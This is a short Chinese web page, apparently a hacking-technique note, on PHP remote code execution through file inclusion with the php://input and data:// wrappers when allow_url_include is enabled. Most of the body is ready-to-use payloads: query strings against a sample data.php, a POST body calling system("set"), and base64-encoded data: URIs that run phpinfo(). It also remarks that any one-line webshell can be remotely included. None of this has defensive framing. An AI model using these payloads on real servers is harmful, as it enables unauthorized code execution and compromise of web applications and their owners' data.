= 5.2.0【優(yōu)勢(shì)】直接POST php代碼并執(zhí)行【須知】必須使用包含切執(zhí)行函數(shù)(比如 include require) 不能使用file_g..."/>
您好,登錄后才能下訂單哦!
條件:
【條件】在allow_url_include = On 且 PHP >= 5.2.0
【優(yōu)勢(shì)】直接POST php代碼并執(zhí)行
【須知】必須使用包含切執(zhí)行函數(shù)(比如 include require) 不能使用file_get_contents等 用這些函數(shù)不會(huì)執(zhí)行data/input里面函數(shù)。
【點(diǎn)評(píng)】這其實(shí)是一種思路而已 當(dāng)allow_url_include打開的時(shí)候 隨便找個(gè)webshell上傳一句話都可以遠(yuǎn)程包含了。
php://input
0x007.com/data.php?a=php://input
post提交:<?php system("set");?> 任意的php代碼
data:
include $_GET['a'];
0x007.com/data.php?a=data:text/plain,<?php phpinfo();
0x007.com/data.php?a=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=
0x007.com/data.php?a=data:;base64,PD9waHBpbmZvKCk7Lyo=
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。